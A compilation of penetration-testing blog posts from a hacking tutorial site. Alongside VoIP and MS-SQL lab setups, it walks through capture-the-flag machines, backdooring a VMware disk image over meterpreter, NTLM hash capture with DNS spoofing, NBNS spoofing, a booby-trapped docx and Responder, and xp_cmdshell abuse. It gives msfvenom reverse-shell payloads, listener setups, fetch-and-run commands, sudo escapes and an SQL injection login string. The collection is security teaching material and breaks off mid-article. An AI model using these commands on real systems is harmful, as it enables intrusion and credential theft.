Hello friends! Today you will learn how to setup VOIP in virtual machine using tribox 2.8.0.4 iso image for making phone calls and sending text messages in local network.

From Wikipedia

Voice over Internet Protocol (also voice over IP, VoIP or IP telephony) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.

Let’s start!!

Open vmware, select option “creates new virtual machine”, now for install from wizard select third option:

I will install operating system later

Then click on next.

Now select 2^nd option “Linux” for guest operating system and select version “ubuntu”. Then click on next and next as per your requirements.

Explore custom hardware for making following changes:

Click on CD/DVD to browse ISO file “tribox 2.8.0.4”.

Select bridges connection and enable the check box for replicate connection for network adapter setting.

Then click on finish.

Trixbox is the world’s most popular Asterisk-based distribution. Trixbox enables even the novice user to quickly set up a voice over IP phone system and other necessary applications such as mysql and more. Trixbox can be configured to handle a single phone line for a home user, several lines for a small office, or several T1s for a million minute a month call center.

It will start rebooting the vm automatically, now for TRIBOX CE installation follow given below steps:

A dialog box will appear for selecting option keyboard type, here chose option “US” as given in below image. Then click on OK tab.

Another dialog box will ask to choose time zone, select Asia/ Kolkata. Then click on OK tab.

Now enter the password you want to give for root user. I had given tribox as password. Again type confirm password and then click on OK tab.

Now it will start installation process automatically which will take some time as shown in given below image. Do not disturb installation until it becomes 100 % completely.

Once installation will complete it will ask for login. Type username: root and password: tribox

Check network interface using “ifconfig” command, now from here I came to know my vm IP: 192.168.1.218.

Now open this IP: 192.168.1.218 in web browser. Here through Tribox GUI we are going to create some users account by assigning them extension number. For example you received 8 digit numbers for your land-line from service providers.

By default tribox GUI open with user mode and for creating extension number we need to switch into admin mode.

Click on switch option from user mode given on top of right corner.

The authentication is required for login into admin mode of tribox.

Now enter username: maint and password: password as admin credential.

You will get a pop up message for tribox registration, close this message.

At tribox platform you will see server status, now click on PBX option and select PBX setting option from given menu.

Under setup list of admin select extensions option as basic setup.

Select device

Now follow given below steps for creating an extension inside the server:

Device: generic SIP device

Click on submit

Add extension

User extension: 1234567 (any 7/8 digit number)

Display name: ignite (name of user/ customer you want assign this number)

Device options

Secret: 123

Dtmfmode: rfc2833

Once you have enter the information for creating a new extension click on submit.

Similarly create one more extension so then we can check communication between both extensions.

From given image you can see now we had configured two extension 1^st for ignite [1234567] and 2^nd for raj[12345678].

We had created two extensions one as caller and other as receiver. You can create multiple extension as per your requirement.

Now click on orange color tile for apply configuration changes to put them into effect.

A pop will open here select continue with reload

Now this is all about server installation and configuration of extension inside it.

Now download ZOIPER application in your system

Zoiper is a VoIP softphone that lets you send messages, make voice and video calls with your friends, family, colleagues and business partners.

Once it is downloaded it will look like as given below image, now go with setting option for configuration of an account which will be able to make call or receive call from another user.

Select account type SIP and click on next.

If you remember in tribox GUI we had add an extension 1234567 for ignite now enter those information in account wizard in order to save it as new contact.

Now enter user number with server IP as given below

1234567@192.168.1218

Enter password for this account.

Click on next.

It will auto detect the account name as shown in given image. Then click on next.

Your one account has been created in accounted list. Now ignite will be able to make calls or receive calls from another users.

We have already created ignite account in system through zoiper for making and receiving calls. Now we need to install zoiper on other device for other users also, who will be able to make or receive call from ignite.

Download zoiper from Google play stores in your android phone.  Run the application after installation.

Click on config icon for configuration of a new account in your phone as shown in given image and select Accounts option from given list of configuration settings.  

Then a new window will open click on add account. A dialog box will appear for account setup click on YES.

Now again a new dialog box will pop up select manual configuration for account setup.

Go for SIP as account type you have chose.

Now enter following information for SIP account setting:

Account name: raj

Host: 192.168.1.218

Username: 12345678

Password: 123

Now click on save.

You can see from given image that account for raj is ready.

Hence we have setup two accounts in zoiper one will act as caller let say raj is caller making call to ignite through his phone and ignite will be receiver and get incoming call on system from raj.

As you know we had configured two extension one for ignite another for raj. Now we are going to test this VOIP setup by making call from raj.

Raj had made call to ignite by dialing his number 1234567 and when you will perform this you will hear the outgoing bell from your phone.

Ignite will get incoming call on system as shown in given image. Click on answer for accepting call from raj.

From given screenshot you can see that the call is connected and raj and ignite is having conversation over VOIP call.

Great!!! Hence in this way you can configure your VOIP server for local network and can communicate with multiple users by making calls or chat.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Lab Setup for VOIP Penetration Testing appeared first on Hacking Articles.

Hello friends!! Today you will how to exploit any operation system running inside the virtual machine.

Requrement

Attacker: kali linux

Target: VM image windows server 2012

First attacker needs to exploit actual operating system of victim PC and attain the meterpreter session with admin privileges.

From given image you can perceive I have seize windows 10 meterpreter session and also gained admin privileges. 

meterpreter > sysinfo

When you install any operating system in your vmware workstation then all its hardware and network setting get store as .vmx file in actual operating system in order to create new virtual image.

Type following for making search of .vmx file stored in it

meterpreter > search –f *.vmx –r

From given image you can perceive that it has dump the all location where .vmx files are stored.

Using cat command you can read the content of file as these file simple text document which contain vm setting information.

We had opened windows server 2012 vm image through cat command.

meterpreter > cat “d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx”

Here from given below image you can read the details of this file which is describing network and hardware setting.

This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots or clones are linked from the file.

use post/windows/manage/vmdk_mount

msf post(vmdk_mount) > set DEL_LCK true

msf post(vmdk_mount) > set READ_MODE false

msf post(vmdk_mount) > set session 2

msf post(vmdk_mount) > set VDK_PATH “d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx”

msf post(vmdk_mount) > run

Great!! We have successfully mount vmdk file of windows server2012.

meterpreter > show_mount

Now from given below image you can read the information of each drives.

Now using given below command I will upload an exe backdoor in L: drive which will give us reverse connection of windows server 2012 when it will be running inside vm workstation.

meterpreter > upload /root/Desktop/abc.exe “L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup”

use exploit/multi/handler

msf exploit(handler) >set payload windows/meterpreter/reverse_tcp

msf exploit(handler) >set lhost 192.168.1.113

msf exploit(handler) >set lport 445

msf exploit(handler) >run

 Awesome!! We have successfully exploited windows server2012 virtual machine and gained its meterpreter session.

meterpreter >sysinfo

Source: http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Post Exploitation in VMware Files with Meterprter appeared first on Hacking Articles.

Hello friends!! Today you will learn how to install and configure MS SQL server in windows 10 operating system.

Requirement:

1. Download setup file ENU\x64\SQLEXPR_x64_ENU.exe
2. Download setup file ENU\x86\SQLManagementStudio_x86_ENU.exe from here
3. Download heidisql tool

Configure SQL express setup

Open the 1st download file for SQL server installation and run as administration. Click on installation then go with New SQL server standalone installation.

To install sql server2012 follow given below three steps:

• License terms
• Product updates
• Install setup files

Here enable the check box for “I accept the license terms” and click on next.

Enable the check box for “Include SQL server product updates” to enhance the SQL server security and performance. It found 26 MB setup online which will get install when you will click on next.

Now it will start installing SQL server setup file on your system which takes some time. As soon as setup gets installed you will get new window screen of feature selection for your SQL server.

Feature Selection

Now select the features you want to install from given image you can see I had enable check box for following features.

• Database Engine service
• SQL Server Replication
• SQL Client Connective SDK

Click on next.

Instance Configuration

Specify the name and instance ID for instance of SQL server. The directory structure, registry structure, and service names all replicate the instance name and a specific instance ID. Instance ID becomes part of installation path.

• Enter SQLExpress in text filed for Name Instance
• Enter SQLExpress in text filed for Instance ID

After then click on next

You can select Default Instance also if an instance of SQL Server is not installed previously. It does not need a user to give the name of the instance to create a connection.

Database Engine Configuration

Specify Database Engine authentication for its security mode   

By default sa is administrator of MS SQL

Under the panel of authentication mode:

• Click on mixed mode which is combination of both type authentications SQL server and Windows.
• Type your password and confirm password for administrator account.

From given image you can observe that selected user will be part of administrator account of SQL server who has the unrestricted access over database engine.

After then click on next and next.

Your SQL server 2012 installation completed successfully, here you can check the status for installed features.

Now open the SQL server configuration manger where you will see left and right panel.

Click on protocol for SQLExpress in left panel and then after select protocol name “TCP/IP” in right panel.

Under IP Addresses specify TCP port 1433 tab, Click on Apply and Enable the TCP/IP.

Configure SQL Management Studio setup

Now open 2nd downloaded application for SQL server management setup and add new feature in it.

No updates for SQL server 2012 click on next.

Installation type

Since we have already created instance “SQLExpress” now we can add featured in SQLExpress instance of SQL server 2012.

From given below image you can observe the table for installed instance. Click on next

Feature selection

For installation of instance feature enable the check box for Management tool basic as shared featured then click on next and next.

Management tool basic installation completed successfully, here you can check the status for installed features. Click on installation then go with New SQL server standalone installation.

Now login into SQL Server using admin credential and click on connect.

Once you are login into SQL server then Explore security folder and create a new login account for other users.

Enter the user name as I had given “ignite” and set password by choosing sql server authentication for this user.

From given image you can observe that master is default database.

Connect to server

Run heidisql tool to connect with MS SQL Server through Ignite user as given below:

Network type: TCP/IP

Hostname /IP: 192.168.1.104

User: ignite

Password: 123456

Port: 1433

HeidiSQL is a useful and reliable tool designed for web developers using the popular MySQLserver, Microsoft SQL databases and PostgreSQL. It enables you to browse and edit data, create and edit tables, views, procedures, triggers and scheduled events.

Now click on open

Great!! We have successfully access the database system of MSSQL server. You can modify or create new table or new database and much more things.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post MS-SQL Penetration Testing lab Setup appeared first on Hacking Articles.

Hello friends! Today we are going to take another CTF challenge known as Zico2. The credit for making this vm machine goes to “Rafael” and it is another boot2root challenge, where we have to root the system to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.26 but you will have to find our own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.0.26

We find port 80 is open, so we open this ip in our browser.

Browsing through the site we find that, this site is vulnerable to LFI.

We couldn’t find anything special here so we use dirb to find directories.

dirb http://192.168.0.26/

We found an interesting link called dbadmin. We open it in our browser.

When we open this page we find another link; this link leads us to phpliteadmin login page.

We tried the password” admin”, and it granted us access.

We find that this version of phpliteadmin is vulnerable to php code injection.

So we create another database and named it shell.php we use this database to inject php code.

After we inject our code we use LFI to execute our shell. Here we can see that ls command was executed when we execute our shell.

Now we create executable file using msfvenom.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.25 lport=4444 -f elf > /root/Desktop/shell

We move it to /var/www/html/ and then setup our listener on metasploit.

We then use php code injection to upload our file to the server make it executable, and execute the file.

We execute the php code using LFI and get a reverse shell.

After searching through the files we find password for user zico in /home/zico/worpress/wp-config.php

We use this password to login through ssh.

After searching through the files, we take loot at the sudoers and find that we are allowed to use a few commands as root.

Now we move to /tmp folder and find a few files that we had uploaded. We use zip to gain root privilege by executing shell command along with zip.

sudo -u root zip shell.zip shell.py -T -unzip-command=”sh -c /bin/bash

After gaining root privilege we move to root folder. Inside the root folder we find a file called flag.txt when we open the file. We get greeted by a message congratulating for the completion of the challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Zico2 VM (CTF Challenge) appeared first on Hacking Articles.

Hello friends! Today we are going to perform Microsoft SQL penetration testing using NMAP scripts in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article we had setup Microsoft SQL server in Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Lets start!!

Scan port 1433

Open the terminal in kali linux and scan target IP for port 1433 using nmap command.

nmap -p 1433 192.168.1.104

From given below image you can observe that port 1433 is open for MS-SQL service.

Enumerating version information

Given below command will attempt to determine configuration and version information for Microsoft SQL Server instances.

nmap -p 1433 –script ms-sql-info 192.168.1.104

In specified below image you can observe the install version and details of MS-SQL server.

Brute Force Attacker

Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.

nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104

In specfied image you can observe that we had successfully retrieve credential for two users:

• Username: ignite and password:12345
• Username: sa and password:123

Execute MS-SQL Query

Once you have retrieved the login credential use these credential in NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL server.

Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.

nmap -p 1433 –script ms-sql-query –script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query=“sp_databases” 192.168.1.104

Hence as result it has dumped two database names “ignite & master” whereas master is the default database name of MS_SQL server.

Check Microsoft SQL server configuration

 Following command will attempt to describe Microsoft SQL server configuration setting by passing login credential as argument through nmap script.

nmap -p 1433 –script ms-sql-config –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

Hence you can check configuration setting from given below image.

Obtain list of tables

Following command will attempt to fetch list of tables from inside Microsoft SQL server by passing login credential as argument through nmap script.

nmap -p 1433 –script ms-sql-tables –script-args mssql.username=sa,mssql.password=admin123

192.168.1.104

Hence you can check list of tables from given below image.

Enumerate NetBIOS information

Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.

Sending a MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with a NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.

 nmap -p 1433 –script ms-sql-ntlm-info 192.168.1.104

Hence from given below image you can read the NETBIOS information remote Microsoft SQL server.

Dump password hashes

Following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. In order to do so the user needs to have the appropriate DB privileges.

nmap -p 1433 –script ms-sql-dump-hashes –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can observe that it has dumped the hash value of passwords of user: sa which we have enumerated above.

Identify database owner

Following command will execute a query against Microsoft SQL Server instances for a list of databases a user has access to. In order to do so the user needs to have the appropriate DB privileges. Therefore we have passes username and password as argument through NMAP script.

nmap -p 1433 –script ms-sql-hashdbaccess –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

In specified image you can observe that it showing user sa is owner the database “ignite”.

Ms-SQL Allows XP_cmdshell option

The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute operating system command. By default, the xp_cmdshell option is disabled.

From given below image you can see we had enable the xp_cmdshell function by executing following statement inside master database.

EXEC sp_configure ‘xp_cmdshell’;

Now save above configuration setting through following statement:

 RECONFIGURE;

Exploit XP_cmdshell Function

Now following NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in targeted server.

nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can confirm that we have executed OS command: net user as retrieve user account.

Blank password lead to unauthorized access

If the admin of Microsoft-SQL Server left the password Blank for login then attacker can director login into database server, from  given below image you can see we are exploring the property of a user’s account “sa”.

Here kept “blank space” as password for user “sa”. As we know by default sa is admin of MS-SQL server and now its password is blank space therefore chances of making unauthorized access into server by attacker will get increases.

Make unauthorized access into SQL server

Following  NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

nmap -p 1433 –script ms-sql-empty 192.168.1.104

From given below image you can perceive we had made successfully login with user: sa and empty password.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post MSSQL Peneration Testing using Nmap appeared first on Hacking Articles.

Hello friends! Today we are describing how to capture NTLM Hash in a local network. In this article we had captured NTLM hash 4 times through various methods. Before we proceed towards attacking techniques, let’s read the brief introduction on NTLM Hash.

The acronym for word NTLM is made by combining following terms:

NT: New technologies (Windows)

LAN: Local area network

M: Manager

In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols. It was the default for network authentication in the Windows NT 4.0 operating system that provides authentication, integrity, and confidentiality to users. The NTLMv2 is the latest version and uses the NT MD4 based one way function. The hash lengths are 128 bits and work for local account and Domain account.

The NTLM protocol uses one or both of two hashed password values, both of which are also stored on the server (or domain controller), and which through a lack of salting are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password.

For more information visit Wikipedia.org

Let’s Begin!!

Requirement

Attacker: Kali Linux

Target: Windows 10

Capture NTLMv2 hash through Sniffing  

Being as attacker open etter.dns file from inside /etc/ettercap  in your Kali Linux system then replace whole text by editing given below line includes attacker’s IP and save the text document.

* A 192.168.1.103

Now follow the given bellow step to run ettercap to start sniffing.

• Application > sniffing and spoofing > ettercap
• Click on sniff and Select your network interface.
• Scan for host to generate target list.

Select the host and add to target, from given image you read among 5 hosts I had chose 192.168.1.101 as target and add to target 1.

Click on MITM from menu bar to select ARP Poisoning, a dialog box will pop-up now enable “sniff remote connects” and click ok.

After then click on plugins option from menu bar and choose dns_spoof

By making use of dns_spoof attacker can redirect victim’s network traffic on his network IP, so that whatever victim will open on his web browser will get redirect on attacker’s IP.

Now load metasploit framework and execute following code to make use of http_ntlm module.

This module attempts to quietly catch NTLM/LM Challenge hashes.

use auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > set srvhost 192.168.1.103

msf auxiliary(http_ntlm) > set SRVPORT 80

msf auxiliary(http_ntlm) > set URIPATH /

msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/

msf auxiliary(http_ntlm) > exploit

Now according to above trap set for victim this module will capture NTLM password of victim’s system when he will open any http web site on his browser which will redirect that web site on attacker’s IP.

From given below image you can notice victim is trying to browse “hackingarticles.in” on his web browser but it requires authentication which is requesting for his username and password. Now if he try to open something else let says google.com there also it will ask username and password for authentication, until the victim will not submit his username and password he cannot browse anything on his web browser.

As the victim enter username and password, attacker at background will capture NTLM hash on his system.

Great!! The attacker had captured NTMLv2 hash, now let count detail apart from hash value that the attacker has captured.

From given image you can see that attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

Now use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Capture NTLMv2 hash through capture SMB & spoof NBNS

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb

msf auxiliary(smb) > set srvhost 192.168.1.103

msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb

msf auxiliary(smb) > exploit

Simultaneously run NBNS_response module under capture smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

use auxiliary/spoof/nbns/nbns_response

msf auxiliary(nbns_response) > set SPOOFIP 1192.168.1.103

msf auxiliary(nbns_response) > set INTERFACE eth0

msf auxiliary(nbns_response) >exploit

As result this module will generate a fake window security prompt on victim’s system to establish connection with another system in order to access share folders of that system.

We had use nmap UDP and TCP port scanning command for identifying open ports and protocol and from given image you can port 137 is open for NetBIOS network service.

Now victim will try to access share folder therefore he will try of connect with him (attacker) through his network IP, given below image is a proof to demonstrate that victim is connecting attacker’s IP: 192.168.1.103.

When victim will try to access share folder, he will get trap into fake window security alert prompt, which will ask victims to enter his username and password for accessing share folders.

Awesome!! Once again the attacker had captured NTMLv2 hash, from given image you can see that here also the attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Capture NTLMv2 hash through capture SMB & word UNC injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010, and 2013.

use auxiliary/docx/word_unc_injector

msf auxiliary(word_unc_injector) >set lhost 192.168.1.103

msf auxiliary(word_unc_injector) >exploit

It has created an empty docx file under given path /root/.msf4/local/

Now send this msf.docx file to victims and again run capture smb module in metasploit framework as done priviously.

From given below image you can observe that in order to get the hashes the auxiliary/server/capture/smb module has been used.

As the victim will open msf.docx file, again the attacker had captured NTMLv2 hash on his system. The only difference between above two attacks and in this attack is that here we had only captured NTLMv2 hash.

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Responder

NBT-NS/LLMNR Responder Created by Laurent Gaffie which is an LLMNR, NBT-NS and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server that can perform above all attacks. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB.

This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.

Now open the new terminal and type following command to download it from github:

git clone https://github.com/SpiderLabs/Responder.git

cd Responder

Once it gets downloaded execute following command to run the python script.

python Responder.py –I 192.168.1.103 -I eth0

From specified image you can perceive that all poisoners and server services gets ON.

Now again victim will try to access share folder therefore he will try of connect with him (attacker) through his network IP, given below image is a proof to display that victim is connecting attacker’s IP: 192.168.1.103.

When victim will try to access share folder, he will get trap into fake network error alert prompt, as shown in given below image.

Once again the attacker had successfully captured NTMLv2 hash, from given image you can see that here also the attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

It will store captured NTLM hash in a text document under given /root/Desktop/Responder/logs.

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Wonderful! These were the four ways to trap the target user in order to capture NTLM hash.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post 4 Ways to Capture NTLM Hashes in Network appeared first on Hacking Articles.

Hello friends! Today we are going to take another CTF challenge known as Lazysysadmin. The credit for making this vm machine goes to “Togie Mcdogie” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.124 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.124

We find port 139 and port 445 is open, so we use smbclient to look for shared disk.

Smbclient -L 192.168.1.124

After finding the shared drive we use smbclient to access the shared folder.

smbclient \\192.168.1.124\share$

Searching through the files we find wordpress folder. In the wordpress folder, we download the wp-config.php file to find the password and username.

In the wp-config.php file we find the username and password for wordpress login.

Now we use dirb to find the wordpress page, as the default page on the server is not based on wordpress.

dirb http://192.168.1.124

Now after finding the wordpress page we open admin login page. We access the admin dashboard using the username and password we found earlier in the wp-config.php file.

We then create a php payload using msfvenom and replace the 404.php page in themes with the code of our payload.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw

We set up our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.1.109

msf exploit(handler) > set lport 4444

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > run

We then call the 404.php page to start our session. The 404.php page can be found in /wp-content/themes/twentyfifteen/404.php

As soon as our payload is executed we get our reverse shell.

After searching through the files, we didn’t find anything. So we go back to the shared folder and in there we download a file called deets.txt

When we open the file we find password for some user.

We open the /etc/passwd file on the VM to find the name of the users.

When we switch users we are prompted by an error message to use terminal, so we spawn /bin/bash using python.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

Then we switch user to togie and use the password we find in deets.txt file

su – togie

We then look into sudoers and find that we have all the privileges of root user so we switch to root.

sudo -l

sudo su

So we switch to root and go into root folder. There we find a file called proof.txt, we open the file and are greeted with a message congratulating for the completion of the CTF challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Lazysysadmin VM (CTF Challenge) appeared first on Hacking Articles.

Hello friends! Today we are going to take another CTF challenge known as Bulldog. The credit for making this vm machine goes to “Nick Frichette” and it is another Boot2root challenge. Our goal is to get into root directory and see the congratulatory message. You can download this VM here.

Let’s Breach!!!

The target holds 192.168.1.158 as network IP; now using nmap lets find out open ports.

nmap -sV 192.168.1.158

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We don’t find anything on the web page. So we use dirb to find the directories for more information.

dirb http://192.168.1.158/

We find quite a few directories, we open http://192.168.1.158/dev/ for information. We didn’t find anything on the web page, so we take a look at the source code of the page. There we find a few passwords in md5 hash encryption for the respective users.

We are able to only crack the last 2 hashes and find 2 strings ‘bulldog’ and ‘bulldoglover’.

We open the admin page we found using dirb. We now use one of these hashes as password and we take the respective username.

We use username as ‘nick’ and password as ‘bulldog’.

After logging in we go to http://192.168.1.107/dev/shell that we found using dirb. We find that it Is a command shell that allows us to execute certain commands. We can easily bypass this firewall using ‘|’ to run multiple commands.

Now we create a python payload using msfvenom.

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4444 > /var/www/html/shell.py

We setup our listener using metasploit for reverse shell.

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.1.111

msf exploit(handler) > set lport 4444

msf exploit(handler) > set payload python/meterpreter/reverse_tcp

msf exploit(handler) > run

We now upload our payload to the server and execute the payload to get reverse shell.

pwd | wget http://192.168.1.111/shell.py | python shell.py

As soon as we execute our payload we get our session on metasploit.

We spawn a shell using python to execute our command.

echo "import pty; pty.spawn("/bin/bash")'

Looking through we find a file customPermissionApp in /home/bulldogadmin/.hiddendirectory/.

We use strings command to take a look at the strings inside customPermissionApp.

strings customPermissionApp

We find a string called SUPERultHimatePASHSWORDyouHCANTget, we remove ‘H’ from the string and use this as our password to get access as root.

sudo su

Then we move to root folder inside the root folder we find a file called ‘congrats.txt’. When we open the file we are greeted by a message congratulating us for the completion of the VM challenge

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Bulldog VM (Boot2Root Challenge) appeared first on Hacking Articles.

BTRSys is boot2root challenge developed by ‘ismailonderkaya’ in the series of BRTSys. This is an amazing lab for practice which has covered every technique.

Difficulty level: Intermediate

WalkThrough

Let’s start by finding our target. And for that use the following command.

netdiscover

We know our target is 192.168.0.106 so, therefore, apply nmap on it as it will help us know which ports and services are open. Use the following command:

nmap -A 192.168.0.106

Due to nmap you can see that port 21, 22 and 80 are open with the service of FTP, SSH and HTTP respectively. As we still have a lot to find about this, we decided to use DIRB. Dirb is web-scanner i.e. it will scan the whole web application for file/directories. It will even show the hidden files. Use the following command:

dirb http://192.168.0.106

As you can see in the above image that using dirb we found various files and directories such as robots.txt, upload, etc. but you can also see that our target web application is using wordpress, so, we can easily apply a wordpress scan using the following command which covers themes, plugins and users:

./wpscan.rb -u http://192.168.0.106/wordpress/ –enumerate at –enumerate ap –enumerate u

As a result we have found two users – btrisk and admin.

Now if you try to login through admin using password admin you have the access of the dashboard. And once you have that access you can execute a malicious PHP code there in to have a meterpreter session. Use the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

The above command will give you a php code which you have to execute. Copy the code from <?php to die(); and paste it in the template as shown below :

Once the code is uploaded, execute it through URL as shown :

192.168.0.106/wordpress/wp-content/themes/twentyfourteen/404.php

Before executing the above URL, make sure that your meterpreter handler is active. And to do so; go to Metasploit and type the following:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 444

exploit

Once the handler is active and url is executed, you will have your session. Let’s check the system’s information which we have entered and for this type:

sysinfo

Now let’s get into shell by simply typing:

shell

Through shell we came to know that Ubuntu’s version is 16.04.2 and fortunately there is exploit in exploit-db for this version of ubuntu. Download this exploit.

This exploit will help you to have achieve privilege escalation so that you can directly access root. Once the exploit is downloaded, we need to compile it and for that type:

gcc 41458.c -o rootshell

Now that the exploit has been compiled, upload it in the /tmp directory. For that you will need to go to /tmp directory. Use the following commands:

cd /tmp

upload /root/Desktop/rootshell

Now got o shell>/tmp and give the permission to the exploit rootshell and the execute it. Use the following commands:

shell

cd /tmp

chmod 777 rootshell

./rootshell

And to confirm use the following command:

whoami

HURRAY!!!! We are in the root. And so our Boot2Root challenge is complete.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the BTRSys: v2.1 VM (Boot2Root Challenge) appeared first on Hacking Articles.

BTRSys v1 is another lab by ‘ismailonderkaya’ in the series BTRSys. This lab helps you sharpen your skills as a pentester. It is a must lab for a beginner.

Difficulty level: Beginner

WalkThrough

Let’s start with finding our target as always by using the following command:

netdiscover

Now as we know our target is 192.168.0.105. Let’s use nmap on it. We all know nmap has many type of scans but aggression scan is much better as it combine and gives all the information at once.

nmap -A 192.168.0.105

Through nmap we know that port 21, 22 and 80 are open with the services of FTP, SSH and HTTP respectively. As nmap hasn’t told us much; we shall dig deeper by using nikto. Nikto is open-source web server scanner which allows you look for dangerous files/programs, outdated versions, index files, http server options, etc. to use nikto type :

nikto -h http://192.168.0.105

With the help of nikto we know that there is login page à /login.php

Let’s go the login page by typing the following in URL:

192.168.0.105/login.php

So now we in on login page but we do not have credentials to log in. Let’s check its page source.

Now in the page source if you observe the function control carefully, you’ll realise that username ends with @btrisk.com so, therefore we can use SQL injection here and for that use the following steps:

Use bruteforce to apply SQL injection. (When asked for text file for bruteforce, select the one with the list of all sql injection commands)

After the completion of brute force it will give the correct sql code which will help you login as shown in above image.

Right click on that code and select ‘Show response in browser’ as shown above. This will open the browser and you will find yourself automatically logged in.

Login Details :  @btrisk.com   ‘ or “=’

